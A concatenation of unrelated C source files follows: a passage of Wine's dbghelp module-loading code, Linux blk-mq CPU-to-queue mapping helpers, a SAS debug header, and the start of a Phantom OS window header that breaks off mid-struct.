module basis) * need some statistics about this */ hash_table_init(&module->pool, &module->ht_symbols, 4096); hash_table_init(&module->pool, &module->ht_types, 4096); vector_init(&module->vtypes, sizeof(struct symt*), 32); module->sources_used = 0; module->sources_alloc = 0; module->sources = 0; wine_rb_init(&module->sources_offsets_tree, source_rb_compare); return module; } /*********************************************************************** * module_find_by_nameW * */ struct module* module_find_by_nameW(const struct process* pcs, const WCHAR* name) { struct module* module; for (module = pcs->lmodules; module; module = module->next) { if (!strcmpiW(name, module->module.ModuleName)) return module; } SetLastError(ERROR_INVALID_NAME); return NULL; } struct module* module_find_by_nameA(const struct process* pcs, const char* name) { WCHAR wname[MAX_PATH]; MultiByteToWideChar(CP_ACP, 0, name, -1, wname, ARRAY_SIZE(wname)); return module_find_by_nameW(pcs, wname); } /*********************************************************************** * module_is_already_loaded * */ struct module* module_is_already_loaded(const struct process* pcs, const WCHAR* name) { struct module* module; const WCHAR* filename; /* first compare the loaded image name... */ for (module = pcs->lmodules; module; module = module->next) { if (!strcmpiW(name, module->module.LoadedImageName)) return module; } /* then compare the standard filenames (without the path) ... */ filename = get_filename(name, NULL); for (module = pcs->lmodules; module; module = module->next) { if (!strcmpiW(filename, get_filename(module->module.LoadedImageName, NULL))) return module; } SetLastError(ERROR_INVALID_NAME); return NULL; } /*********************************************************************** * module_get_container * */ static struct module* module_get_container(const struct process* pcs, const struct module* inner) { struct module* module; for (module = pcs->lmodules; module; module = module->next) { if (module != inner && module->module.BaseOfImage <= inner->module.BaseOfImage && module->module.BaseOfImage + module->module.ImageSize >= inner->module.BaseOfImage + inner->module.ImageSize) return module; } return NULL; } /*********************************************************************** * module_get_containee * */ struct module* module_get_containee(const struct process* pcs, const struct module* outer) { struct module* module; for (module = pcs->lmodules; module; module = module->next) { if (module != outer && outer->module.BaseOfImage <= module->module.BaseOfImage && outer->module.BaseOfImage + outer->module.ImageSize >= module->module.BaseOfImage + module->module.ImageSize) return module; } return NULL; } /****************************************************************** * module_get_debug * * get the debug information from a module: * - if the module's type is deferred, then force loading of debug info (and return * the module itself) * - if the module has no debug info and has an ELF container, then return the ELF * container (and also force the ELF container's debug info loading if deferred) * - otherwise return the module itself if it has some debug info */ BOOL module_get_debug(struct module_pair* pair) { IMAGEHLP_DEFERRED_SYMBOL_LOADW64 idslW64; if (!pair->requested) return FALSE; /* for a PE builtin, always get info from container */ if (!(pair->effective = module_get_container(pair->pcs, pair->requested))) pair->effective = pair->requested; /* if deferred, force loading */ if (pair->effective->module.SymType == SymDeferred) { BOOL ret; if (pair->effective->is_virtual) ret = FALSE; else switch (pair->effective->type) { case DMT_ELF: ret = elf_load_debug_info(pair->effective); break; case DMT_PE: idslW64.SizeOfStruct = sizeof(idslW64); idslW64.BaseOfImage = pair->effective->module.BaseOfImage; idslW64.CheckSum = pair->effective->module.CheckSum; idslW64.TimeDateStamp = pair->effective->module.TimeDateStamp; memcpy(idslW64.FileName, pair->effective->module.ImageName, sizeof(pair->effective->module.ImageName)); idslW64.Reparse = FALSE; idslW64.hFile = INVALID_HANDLE_VALUE; pcs_callback(pair->pcs, CBA_DEFERRED_SYMBOL_LOAD_START, &idslW64); ret = pe_load_debug_info(pair->pcs, pair->effective); pcs_callback(pair->pcs, ret ? CBA_DEFERRED_SYMBOL_LOAD_COMPLETE : CBA_DEFERRED_SYMBOL_LOAD_FAILURE, &idslW64); break; case DMT_MACHO: ret = macho_load_debug_info(pair->pcs, pair->effective); break; default: ret = FALSE; break; } if (!ret) pair->effective->module.SymType = SymNone; assert(pair->effective->module.SymType != SymDeferred); pair->effective->module.NumSyms = pair->effective->ht_symbols.num_elts; } return pair->effective->module.SymType != SymNone; } /*********************************************************************** * module_find_by_addr * * either the addr where module is loaded, or any address inside the * module */ struct module* module_find_by_addr(const struct process* pcs, DWORD64 addr, enum module_type type) { struct module* module; if (type == DMT_UNKNOWN) { if ((module = module_find_by_addr(pcs, addr, DMT_PE)) || (module = module_find_by_addr(pcs, addr, DMT_ELF)) || (module = module_find_by_addr(pcs, addr, DMT_MACHO))) return module; } else { for (module = pcs->lmodules; module; module = module->next) { if (type == module->type && addr >= module->module.BaseOfImage && addr < module->module.BaseOfImage + module->module.ImageSize) return module; } } SetLastError(ERROR_MOD_NOT_FOUND); return module; } /****************************************************************** * module_is_container_loaded * * checks whether the native container, for a (supposed) PE builtin is * already loaded */ static BOOL module_is_container_loaded(const struct process* pcs, const WCHAR* ImageName, DWORD64 base) { size_t len; struct module* module; PCWSTR filename, modname; if (!base) return FALSE; filename = get_filename(ImageName, NULL); len = strlenW(filename); for (module = pcs->lmodules; module; module = module->next) { if ((module->type == DMT_ELF || module->type == DMT_MACHO) && base >= module->module.BaseOfImage && base < module->module.BaseOfImage + module->module.ImageSize) { modname = get_filename(module->module.LoadedImageName, NULL); if (!strncmpiW(modname, filename, len) && !memcmp(modname + len, S_DotSoW, 3 * sizeof(WCHAR))) { return TRUE; } } } /* likely a native PE module */ WARN("Couldn't find container for %s\n", debugstr_w(ImageName)); return FALSE; } /****************************************************************** * module_get_type_by_name * * Guesses a filename type from its extension */ enum module_type module_get_type_by_name(const WCHAR* name) { int len = strlenW(name); /* Skip all version extensions (.[digits]) regex: "(\.\d+)*$" */ do { int i = len; while (i && name[i - 1] >= '0' && name[i - 1] <= '9') i--; if (i && name[i - 1] == '.') len = i - 1; else break; } while (len); /* check for terminating .so or .so.[digit] */ /* FIXME: Can't rely solely on extension; have to check magic or * stop using .so on Mac OS X. For now, base on platform. */ if (len > 3 && !memcmp(name + len - 3, S_DotSoW, 3)) #ifdef __APPLE__ return DMT_MACHO; #else return DMT_ELF; #endif if (len > 6 && !strncmpiW(name + len - 6, S_DotDylibW, 6)) return DMT_MACHO; if (len > 4 && !strncmpiW(name + len - 4, S_DotPdbW, 4)) return DMT_PDB; if (len > 4 && !strncmpiW(name + len - 4, S_DotDbgW, 4)) return DMT_DBG; /* wine is also a native module (Mach-O on Mac OS X, ELF elsewhere) */ if (is_wine_loader(name)) { #ifdef __APPLE__ return DMT_MACHO; #else return DMT_ELF; #endif } return DMT_PE; } /****************************************************************** * refresh_module_list */ static BOOL refresh_module_list(struct process* pcs) { /* force transparent ELF and Mach-O loading / unloading */ return elf_synchronize_module_list(pcs) || macho_synchronize_module_list(pcs); } /*********************************************************************** * SymLoadModule (DBGHELP.@) */ DWORD WINAPI SymLoadModule(HANDLE hProcess, HANDLE hFile, PCSTR ImageName, PCSTR ModuleName, DWORD BaseOfDll, DWORD SizeOfDll) { return SymLoadModuleEx(hProcess, hFile, ImageName, ModuleName, BaseOfDll, SizeOfDll, NULL, 0); } /*********************************************************************** * SymLoadModuleEx (DBGHELP.@) */ DWORD64 WINAPI SymLoadModuleEx(HANDLE hProcess, HANDLE hFile, PCSTR ImageName, PCSTR ModuleName, DWORD64 BaseOfDll, DWORD DllSize, PMODLOAD_DATA Data, DWORD Flags) { PWSTR wImageName, wModuleName; unsigned len; DWORD64 ret; TRACE("(%p %p %s %s %s %08x %p %08x)\n", hProcess, hFile, debugstr_a(ImageName), debugstr_a(ModuleName), wine_dbgstr_longlong(BaseOfDll), DllSize, Data, Flags); if (ImageName) { len = MultiByteToWideChar(CP_ACP, 0, ImageName, -1, NULL, 0); wImageName = HeapAlloc(GetProcessHeap(), 0, len * sizeof(WCHAR)); MultiByteToWideChar(CP_ACP, 0, ImageName, -1, wImageName, len); } else wImageName = NULL; if (ModuleName) { len = MultiByteToWideChar(CP_ACP, 0, ModuleName, -1, NULL, 0); wModuleName = HeapAlloc(GetProcessHeap(), 0, len * sizeof(WCHAR)); MultiByteToWideChar(CP_ACP, 0, ModuleName, -1, wModuleName, len); } else wModuleName = NULL; ret = SymLoadModuleExW(hProcess, hFile, wImageName, wModuleName, BaseOfDll, DllSize, Data, Flags); HeapFree(GetProcessHeap(), 0, wImageName); HeapFree(GetProcessHeap(), 0, wModuleName); return ret; } /*********************************************************************** * SymLoadModuleExW (DBGHELP.@) */ DWORD64 WINAPI SymLoadModuleExW(HANDLE hProcess, HANDLE hFile, PCWSTR wImageName, PCWSTR wModuleName, DWORD64 BaseOfDll, DWORD SizeOfDll, PMODLOAD_DATA Data, DWORD Flags) { struct process* pcs; struct module* module = NULL; TRACE("(%p %p %s %s %s %08x %p %08x)\n", hProcess, hFile, debugstr_w(wImageName), debugstr_w(wModuleName), wine_dbgstr_longlong(BaseOfDll), SizeOfDll, Data, Flags); if (Data) FIXME("Unsupported load data parameter %p for %s\n", Data, debugstr_w(wImageName)); if (!validate_addr64(BaseOfDll)) return FALSE; if (!(pcs = process_find_by_handle(hProcess))) return FALSE; if (Flags & SLMFLAG_VIRTUAL) { if (!wImageName) return FALSE; module = module_new(pcs, wImageName, module_get_type_by_name(wImageName), TRUE, BaseOfDll, SizeOfDll, 0, 0); if (!module) return FALSE; if (wModuleName) module_set_module(module, wModuleName); module->module.SymType = SymVirtual; return TRUE; } if (Flags & ~(SLMFLAG_VIRTUAL)) FIXME("Unsupported Flags %08x for %s\n", Flags, debugstr_w(wImageName)); refresh_module_list(pcs); /* this is a Wine extension to the API just to redo the synchronisation */ if (!wImageName && !hFile) return 0; /* check if the module is already loaded, or if it's a builtin PE module with * an containing ELF module */ if (wImageName) { module = module_is_already_loaded(pcs, wImageName); if (!module && module_is_container_loaded(pcs, wImageName, BaseOfDll)) { /* force the loading of DLL as builtin */ module = pe_load_builtin_module(pcs, wImageName, BaseOfDll, SizeOfDll); } } if (!module) { /* otherwise, try a regular PE module */ if (!(module = pe_load_native_module(pcs, wImageName, hFile, BaseOfDll, SizeOfDll)) && wImageName) { /* and finally an ELF or Mach-O module */ switch (module_get_type_by_name(wImageName)) { case DMT_ELF: module = elf_load_module(pcs, wImageName, BaseOfDll); break; case DMT_MACHO: module = macho_load_module(pcs, wImageName, BaseOfDll); break; default: /* Ignored */ break; } } } if (!module) { WARN("Couldn't locate %s\n", debugstr_w(wImageName)); return 0; } module->module.NumSyms = module->ht_symbols.num_elts; /* by default module_new fills module.ModuleName from a derivation * of LoadedImageName. Overwrite it, if we have better information */ if (wModuleName) module_set_module(module, wModuleName); if (wImageName) lstrcpynW(module->module.ImageName, wImageName, ARRAY_SIZE(module->module.ImageName)); return module->module.BaseOfImage; } /*********************************************************************** * SymLoadModule64 (DBGHELP.@) */ DWORD64 WINAPI SymLoadModule64(HANDLE hProcess, HANDLE hFile, PCSTR ImageName, PCSTR ModuleName, DWORD64 BaseOfDll, DWORD SizeOfDll) { return SymLoadModuleEx(hProcess, hFile, ImageName, ModuleName, BaseOfDll, SizeOfDll, NULL, 0); } /****************************************************************** * module_remove * */ BOOL module_remove(struct process* pcs, struct module* module) { struct module_format*modfmt; struct module** p; unsigned i; TRACE("%s (%p)\n", debugstr_w(module->module.ModuleName), module); for (i = 0; i < DFI_LAST; i++) { if ((modfmt = module->format_info[i]) && modfmt->remove) modfmt->remove(pcs, module->format_info[i]); } hash_table_destroy(&module->ht_symbols); hash_table_destroy(&module->ht_types); HeapFree(GetProcessHeap(), 0, module->sources); HeapFree(GetProcessHeap(), 0, module->addr_sorttab); pool_destroy(&module->pool); /* native dbghelp doesn't invoke registered callback(,CBA_SYMBOLS_UNLOADED,) here * so do we */ for (p = &pcs->lmodules; *p; p = &(*p)->next) { if (*p == module) { *p = module->next; HeapFree(GetProcessHeap(), 0, module); return TRUE; } } FIXME("This shouldn't happen\n"); return FALSE; } /****************************************************************** * SymUnloadModule (DBGHELP.@) * */ BOOL WINAPI SymUnloadModule(HANDLE hProcess, DWORD BaseOfDll) { struct process* pcs; struct module* module; pcs = process_find_by_handle(hProcess); if (!pcs) return FALSE; module = module_find_by_addr(pcs, BaseOfDll, DMT_UNKNOWN); if (!module) return FALSE; return module_remove(pcs, module); } /****************************************************************** * SymUnloadModule64 (DBGHELP.@) * */ BOOL WINAPI SymUnloadModule64(HANDLE hProcess, DWORD64 BaseOfDll) { struct process* pcs; struct module* module; pcs = process_find_by_handle(hProcess); if (!pcs) return FALSE; if (!validate_addr64(BaseOfDll)) return FALSE; module = module_find_by_addr(pcs, BaseOfDll, DMT_UNKNOWN); if (!module) return FALSE; return module_remove(pcs, module); } /****************************************************************** * SymEnumerateModules (DBGHELP.@) * */ struct enum_modW64_32 { PSYM_ENUMMODULES_CALLBACK cb; PVOID user; char module[MAX_PATH]; }; static BOOL CALLBACK enum_modW64_32(PCWSTR name, DWORD64 base, PVOID user) { struct enum_modW64_32* x = user; WideCharToMultiByte(CP_ACP, 0, name, -1, x->module, sizeof(x->module), NULL, NULL); return x->cb(x->module, (DWORD)base, x->user); } BOOL WINAPI SymEnumerateModules(HANDLE hProcess, PSYM_ENUMMODULES_CALLBACK EnumModulesCallback, PVOID UserContext) { struct enum_modW64_32 x; x.cb = EnumModulesCallback; x.user = UserContext; return SymEnumerateModulesW64(hProcess, enum_modW64_32, &x); } /****************************************************************** * SymEnumerateModules64 (DBGHELP.@) * */ struct enum_modW64_64 { PSYM_ENUMMODULES_CALLBACK64 cb; PVOID user; char module[MAX_PATH]; }; static BOOL CALLBACK enum_modW64_64(PCWSTR name, DWORD64 base, PVOID user) { struct enum_modW64_64* x = user; WideCharToMultiByte(CP_ACP, 0, name, -1, x->module, sizeof(x->module), NULL, NULL); return x->cb(x->module, base, x->user); } BOOL WINAPI SymEnumerateModules64(HANDLE hProcess, PSYM_ENUMMODULES_CALLBACK64 EnumModulesCallback, PVOID UserContext) { struct enum_modW64_64 x; x.cb = EnumModulesCallback; x.user = UserContext; return SymEnumerateModulesW64(hProcess, enum_modW64_64, &x); } /****************************************************************** * SymEnumerateModulesW64 (DBGHELP.@) * */ BOOL WINAPI SymEnumerateModulesW64(HANDLE hProcess, PSYM_ENUMMODULES_CALLBACKW64 EnumModulesCallback, PVOID UserContext) { struct process* pcs = process_find_by_handle(hProcess); struct module* module; if (!pcs) return FALSE; for (module = pcs->lmodules; module; module = module->next) { if (!dbghelp_opt_native && (module->type == DMT_ELF || module->type == DMT_MACHO)) continue; if (!EnumModulesCallback(module->modulename, module->module.BaseOfImage, UserContext)) break; } return TRUE; } /****************************************************************** * EnumerateLoadedModules64 (DBGHELP.@) * */ struct enum_load_modW64_64 { PENUMLOADED_MODULES_CALLBACK64 cb; PVOID user; char module[MAX_PATH]; }; static BOOL CALLBACK enum_load_modW64_64(PCWSTR name, DWORD64 base, ULONG size, PVOID user) { struct enum_load_modW64_64* x = user; WideCharToMultiByte(CP_ACP, 0, name, -1, x->module, sizeof(x->module), NULL, NULL); return x->cb(x->module, base, size, x->user); } BOOL WINAPI EnumerateLoadedModules64(HANDLE hProcess, PENUMLOADED_MODULES_CALLBACK64 EnumLoadedModulesCallback, PVOID UserContext) { struct enum_load_modW64_64 x; x.cb = EnumLoadedModulesCallback; x.user = UserContext; return EnumerateLoadedModulesW64(hProcess, enum_load_modW64_64, &x); } /****************************************************************** * EnumerateLoadedModules (DBGHELP.@) * */ struct enum_load_modW64_32 { PENUMLOADED_MODULES_CALLBACK cb; PVOID user; char module[MAX_PATH]; }; static BOOL CALLBACK enum_load_modW64_32(PCWSTR name, DWORD64 base, ULONG size, PVOID user) { struct enum_load_modW64_32* x = user; WideCharToMultiByte(CP_ACP, 0, name, -1, x->module, sizeof(x->module), NULL, NULL); return x->cb(x->module, (DWORD)base, size, x->user); } BOOL WINAPI EnumerateLoadedModules(HANDLE hProcess, PENUMLOADED_MODULES_CALLBACK EnumLoadedModulesCallback, PVOID UserContext) { struct enum_load_modW64_32 x; x.cb = EnumLoadedModulesCallback; x.user = UserContext; return EnumerateLoadedModulesW64(hProcess, enum_load_modW64_32, &x); } /****************************************************************** * EnumerateLoadedModulesW64 (DBGHELP.@) * */ BOOL WINAPI EnumerateLoadedModulesW64(HANDLE hProcess, PENUMLOADED_MODULES_CALLBACKW64 EnumLoadedModulesCallback, PVOID UserContext) { HMODULE* hMods; WCHAR baseW[256], modW[256]; DWORD i, sz; MODULEINFO mi; hMods = HeapAlloc(GetProcessHeap(), 0, 256 * sizeof(hMods[0])); if (!hMods) return FALSE; if (!EnumProcessModules(hProcess, hMods, 256 * sizeof(hMods[0]), &sz)) { /* hProcess should also be a valid process handle !! */ FIXME("If this happens, bump the number in mod\n"); HeapFree(GetProcessHeap(), 0, hMods); return FALSE; } sz /= sizeof(HMODULE); for (i = 0; i < sz; i++) { if (!GetModuleInformation(hProcess, hMods[i], &mi, sizeof(mi)) || !GetModuleBaseNameW(hProcess, hMods[i], baseW, ARRAY_SIZE(baseW))) continue; module_fill_module(baseW, modW, ARRAY_SIZE(modW)); EnumLoadedModulesCallback(modW, (DWORD_PTR)mi.lpBaseOfDll, mi.SizeOfImage, UserContext); } HeapFree(GetProcessHeap(), 0, hMods); return sz != 0 && i == sz; } static void dbghelp_str_WtoA(const WCHAR *src, char *dst, int dst_len) { WideCharToMultiByte(CP_ACP, 0, src, -1, dst, dst_len - 1, NULL, NULL); dst[dst_len - 1] = 0; } /****************************************************************** * SymGetModuleInfo (DBGHELP.@) * */ BOOL WINAPI SymGetModuleInfo(HANDLE hProcess, DWORD dwAddr, PIMAGEHLP_MODULE ModuleInfo) { IMAGEHLP_MODULE mi; IMAGEHLP_MODULEW64 miw64; if (sizeof(mi) < ModuleInfo->SizeOfStruct) FIXME("Wrong size\n"); miw64.SizeOfStruct = sizeof(miw64); if (!SymGetModuleInfoW64(hProcess, dwAddr, &miw64)) return FALSE; mi.SizeOfStruct = ModuleInfo->SizeOfStruct; mi.BaseOfImage = miw64.BaseOfImage; mi.ImageSize = miw64.ImageSize; mi.TimeDateStamp = miw64.TimeDateStamp; mi.CheckSum = miw64.CheckSum; mi.NumSyms = miw64.NumSyms; mi.SymType = miw64.SymType; dbghelp_str_WtoA(miw64.ModuleName, mi.ModuleName, sizeof(mi.ModuleName)); dbghelp_str_WtoA(miw64.ImageName, mi.ImageName, sizeof(mi.ImageName)); dbghelp_str_WtoA(miw64.LoadedImageName, mi.LoadedImageName, sizeof(mi.LoadedImageName)); memcpy(ModuleInfo, &mi, ModuleInfo->SizeOfStruct); return TRUE; } /****************************************************************** * SymGetModuleInfoW (DBGHELP.@) * */ BOOL WINAPI SymGetModuleInfoW(HANDLE hProcess, DWORD dwAddr, PIMAGEHLP_MODULEW ModuleInfo) { IMAGEHLP_MODULEW64 miw64; IMAGEHLP_MODULEW miw; if (sizeof(miw) < ModuleInfo->SizeOfStruct) FIXME("Wrong size\n"); miw64.SizeOfStruct = sizeof(miw64); if (!SymGetModuleInfoW64(hProcess, dwAddr, &miw64)) return FALSE; miw.SizeOfStruct = ModuleInfo->SizeOfStruct; miw.BaseOfImage = miw64.BaseOfImage; miw.ImageSize = miw64.ImageSize; miw.TimeDateStamp = miw64.TimeDateStamp; miw.CheckSum = miw64.CheckSum; miw.NumSyms = miw64.NumSyms; miw.SymType = miw64.SymType; strcpyW(miw.ModuleName, miw64.ModuleName); strcpyW(miw.ImageName, miw64.ImageName); strcpyW(miw.LoadedImageName, miw64.LoadedImageName); memcpy(ModuleInfo, &miw, ModuleInfo->SizeOfStruct); return TRUE; } /****************************************************************** * SymGetModuleInfo64 (DBGHELP.@) * */ BOOL WINAPI SymGetModuleInfo64(HANDLE hProcess, DWORD64 dwAddr, PIMAGEHLP_MODULE64 ModuleInfo) { IMAGEHLP_MODULE64 mi64; IMAGEHLP_MODULEW64 miw64; if (sizeof(mi64) < ModuleInfo->SizeOfStruct) { SetLastError(ERROR_MOD_NOT_FOUND); /* NOTE: native returns this error */ WARN("Wrong size %u\n", ModuleInfo->SizeOfStruct); return FALSE; } miw64.SizeOfStruct = sizeof(miw64); if (!SymGetModuleInfoW64(hProcess, dwAddr, &miw64)) return FALSE; mi64.SizeOfStruct = ModuleInfo->SizeOfStruct; mi64.BaseOfImage = miw64.BaseOfImage; mi64.ImageSize = miw64.ImageSize; mi64.TimeDateStamp = miw64.TimeDateStamp; mi64.CheckSum = miw64.CheckSum; mi64.NumSyms = miw64.NumSyms; mi64.SymType = miw64.SymType; dbghelp_str_WtoA(miw64.ModuleName, mi64.ModuleName, sizeof(mi64.ModuleName)); dbghelp_str_WtoA(miw64.ImageName, mi64.ImageName, sizeof(mi64.ImageName)); dbghelp_str_WtoA(miw64.LoadedImageName, mi64.LoadedImageName, sizeof(mi64.LoadedImageName)); dbghelp_str_WtoA(miw64.LoadedPdbName, mi64.LoadedPdbName, sizeof(mi64.LoadedPdbName)); mi64.CVSig = miw64.CVSig; dbghelp_str_WtoA(miw64.CVData, mi64.CVData, sizeof(mi64.CVData)); mi64.PdbSig = miw64.PdbSig; mi64.PdbSig70 = miw64.PdbSig70; mi64.PdbAge = miw64.PdbAge; mi64.PdbUnmatched = miw64.PdbUnmatched; mi64.DbgUnmatched = miw64.DbgUnmatched; mi64.LineNumbers = miw64.LineNumbers; mi64.GlobalSymbols = miw64.GlobalSymbols; mi64.TypeInfo = miw64.TypeInfo; mi64.SourceIndexed = miw64.SourceIndexed; mi64.Publics = miw64.Publics; memcpy(ModuleInfo, &mi64, ModuleInfo->SizeOfStruct); return TRUE; } /****************************************************************** * SymGetModuleInfoW64 (DBGHELP.@) * */ BOOL WINAPI SymGetModuleInfoW64(HANDLE hProcess, DWORD64 dwAddr, PIMAGEHLP_MODULEW64 ModuleInfo) { struct process* pcs = process_find_by_handle(hProcess); struct module* module; IMAGEHLP_MODULEW64 miw64; TRACE("%p %s %p\n", hProcess, wine_dbgstr_longlong(dwAddr), ModuleInfo); if (!pcs) return FALSE; if (ModuleInfo->SizeOfStruct > sizeof(*ModuleInfo)) return FALSE; module = module_find_by_addr(pcs, dwAddr, DMT_UNKNOWN); if (!module) return FALSE; miw64 = module->module; /* update debug information from container if any */ if (module->module.SymType == SymNone) { module = module_get_container(pcs, module); if (module && module->module.SymType != SymNone) { miw64.SymType = module->module.SymType; miw64.NumSyms = module->module.NumSyms; } } memcpy(ModuleInfo, &miw64, ModuleInfo->SizeOfStruct); return TRUE; } /*********************************************************************** * SymGetModuleBase (DBGHELP.@) */ DWORD WINAPI SymGetModuleBase(HANDLE hProcess, DWORD dwAddr) { DWORD64 ret; ret = SymGetModuleBase64(hProcess, dwAddr); return validate_addr64(ret) ? ret : 0; } /*********************************************************************** * SymGetModuleBase64 (DBGHELP.@) */ DWORD64 WINAPI SymGetModuleBase64(HANDLE hProcess, DWORD64 dwAddr) { struct process* pcs = process_find_by_handle(hProcess); struct module* module; if (!pcs) return 0; module = module_find_by_addr(pcs, dwAddr, DMT_UNKNOWN); if (!module) return 0; return module->module.BaseOfImage; } /****************************************************************** * module_reset_debug_info * Removes any debug information linked to a given module. */ void module_reset_debug_info(struct module* module) { module->sortlist_valid = TRUE; module->sorttab_size = 0; module->addr_sorttab = NULL; module->num_sorttab = module->num_symbols = 0; hash_table_destroy(&module->ht_symbols); module->ht_symbols.num_buckets = 0; module->ht_symbols.buckets = NULL; hash_table_destroy(&module->ht_types); module->ht_types.num_buckets = 0; module->ht_types.buckets = NULL; module->vtypes.num_elts = 0; hash_table_destroy(&module->ht_symbols); module->sources_used = module->sources_alloc = 0; module->sources = NULL; } /****************************************************************** * SymRefreshModuleList (DBGHELP.@) */ BOOL WINAPI SymRefreshModuleList(HANDLE hProcess) { struct process* pcs; TRACE("(%p)\n", hProcess); if (!(pcs = process_find_by_handle(hProcess))) return FALSE; return refresh_module_list(pcs); } /*********************************************************************** * SymFunctionTableAccess (DBGHELP.@) */ PVOID WINAPI SymFunctionTableAccess(HANDLE hProcess, DWORD AddrBase) { return SymFunctionTableAccess64(hProcess, AddrBase); } /*********************************************************************** * SymFunctionTableAccess64 (DBGHELP.@) */ PVOID WINAPI SymFunctionTableAccess64(HANDLE hProcess, DWORD64 AddrBase) { struct process* pcs = process_find_by_handle(hProcess); struct module* module; if (!pcs || !dbghelp_current_cpu->find_runtime_function) return NULL; module = module_find_by_addr(pcs, AddrBase, DMT_UNKNOWN); if (!module) return NULL; return dbghelp_current_cpu->find_runtime_function(module, AddrBase); }
{ "language": "C" }
// SPDX-License-Identifier: GPL-2.0 /* * CPU <-> hardware queue mapping helpers * * Copyright (C) 2013-2014 Jens Axboe */ #include <linux/kernel.h> #include <linux/threads.h> #include <linux/module.h> #include <linux/mm.h> #include <linux/smp.h> #include <linux/cpu.h> #include <linux/blk-mq.h> #include "blk.h" #include "blk-mq.h" static int queue_index(struct blk_mq_queue_map *qmap, unsigned int nr_queues, const int q) { return qmap->queue_offset + (q % nr_queues); } static int get_first_sibling(unsigned int cpu) { unsigned int ret; ret = cpumask_first(topology_sibling_cpumask(cpu)); if (ret < nr_cpu_ids) return ret; return cpu; } int blk_mq_map_queues(struct blk_mq_queue_map *qmap) { unsigned int *map = qmap->mq_map; unsigned int nr_queues = qmap->nr_queues; unsigned int cpu, first_sibling, q = 0; for_each_possible_cpu(cpu) map[cpu] = -1; /* * Spread queues among present CPUs first for minimizing * count of dead queues which are mapped by all un-present CPUs */ for_each_present_cpu(cpu) { if (q >= nr_queues) break; map[cpu] = queue_index(qmap, nr_queues, q++); } for_each_possible_cpu(cpu) { if (map[cpu] != -1) continue; /* * First do sequential mapping between CPUs and queues. * In case we still have CPUs to map, and we have some number of * threads per cores then map sibling threads to the same queue * for performance optimizations. */ if (q < nr_queues) { map[cpu] = queue_index(qmap, nr_queues, q++); } else { first_sibling = get_first_sibling(cpu); if (first_sibling == cpu) map[cpu] = queue_index(qmap, nr_queues, q++); else map[cpu] = map[first_sibling]; } } return 0; } EXPORT_SYMBOL_GPL(blk_mq_map_queues); /** * blk_mq_hw_queue_to_node - Look up the memory node for a hardware queue index * @qmap: CPU to hardware queue map. * @index: hardware queue index. * * We have no quick way of doing reverse lookups. This is only used at * queue init time, so runtime isn't important. */ int blk_mq_hw_queue_to_node(struct blk_mq_queue_map *qmap, unsigned int index) { int i; for_each_possible_cpu(i) { if (index == qmap->mq_map[i]) return local_memory_node(cpu_to_node(i)); } return NUMA_NO_NODE; }
{ "language": "C" }
/* * Serial Attached SCSI (SAS) Dump/Debugging routines header file * * Copyright (C) 2005 Adaptec, Inc. All rights reserved. * Copyright (C) 2005 Luben Tuikov <luben_tuikov@adaptec.com> * * This file is licensed under GPLv2. * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License as * published by the Free Software Foundation; either version 2 of the * License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, but * WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA * */ #include "sas_internal.h" void sas_dprint_porte(int phyid, enum port_event pe); void sas_dprint_phye(int phyid, enum phy_event pe); void sas_dprint_hae(struct sas_ha_struct *sas_ha, enum ha_event he); void sas_dump_port(struct asd_sas_port *port);
{ "language": "C" }
/** * * Phantom OS * * Copyright (C) 2005-2011 Phantom OS team * Copyright (C) 2005-2019 Dmitry Zavalishin, dz@dz.ru * * Window. * **/ #ifndef WINDOW_H #define WINDOW_H #ifndef VCONFIG_H #include <video/vconfig.h> #endif // VCONFIG_H #include <phantom_types.h> #include <queue.h> #include <video/color.h> #include <video/bitmap.h> #include <event.h> #include <kernel/pool.h> #define VIDEO_T_IN_D 0 typedef struct drv_video_window * window_handle_t; typedef pool_handle_t taskbar_handle_t; // Win flags supposed to stay the same #define WFLAG_WIN_DECORATED (1<<0) // This is temp win, not included in allwindows list #define WFLAG_WIN_NOTINALL (1<<1) // Don't bring focus to this window #define WFLAG_WIN_NOFOCUS (1<<2) // Don't free window pixels #define WFLAG_WIN_NOPIXELS (1<<3) // Can not treat all pixels alpha as 0xFF #define WFLAG_WIN_NOTOPAQUE (1<<4) // Must be on top of all others #define WFLAG_WIN_ONTOP (1<<5) // Double buffered window #define WFLAG_WIN_DOUBLEBUF (1<<6) // In double buffered mode window is supposed to completely // repaint itself each buffer swap. No buffer copy occures. #define WFLAG_WIN_FULLPAINT (1<<7) // Don't bring focus to this window by key event (ctrl-tab) #define WFLAG_WIN_NOKEYFOCUS (1<<8) // Put this window to task bar - it is a main application window - UNIMPL yet #define WFLAG_WIN_TASK_BAR (1<<9) // For menu - hide if focus is gone #define WFLAG_WIN_HIDE_ON_FOCUS_LOSS (1<<10) #define WIN_HAS_FLAG(__w,__f) ((__w)->flags & (__f)) // Win state can change frequently #define WSTATE_WIN_FOCUSED (1<<0) #define WSTATE_WIN_DRAGGED (1<<1) #define WSTATE_WIN_VISIBLE (1<<2) #define WSTATE_WIN_ROLLEDUP (1<<3) // No one is above #define WSTATE_WIN_UNCOVERED (1<<8) // Pixels live in graphics device's framebuf - can use hw blitter #define WSTATE_WIN_INFB (1<<9) // Default button ids #define WBUTTON_SYS(id) (0xFFFF|((id)<<16)) #define WBUTTON_SYS_ROLLUP WBUTTON_SYS(0) #define WBUTTON_SYS_CLOSE WBUTTON_SYS(1) // ----------------------------------------------------------------------- // Window struct // ----------------------------------------------------------------------- /** * * Main structure representing window. * * SNAPSHOT WARNING: this structure is used in snapshotted objects. * If you change it, old snapshots are invalid. Be careful. * * * **/ typedef struct drv_video_window { int xsize; //< Pixels int ysize; int x, y, z; //< On screen int dx, dy; //< Drag base (see titleMouseEventProcessor) int flags; //< Not supposed to change during window's life int state; //< Can change anytime queue_chain_t chain; //< All windows are on this chain int li, ti, ri, bi; //< insets - unused? rgba_t bg; //< background color const char* title; queue_head_t events; //< Incoming events volatile int events_count; //< To prevent overfill of dead window q int stall; //< True if event queue is overloaded and events are being lost /*! * Called from main event dispatch thread after event is placed to * window event queue. Supposed to process event or trigger waiting * thread to do that. */ int (*inKernelEventProcess)( struct drv_video_window *w, struct ui_event *e ); hal_sem_t *eventDeliverSema; 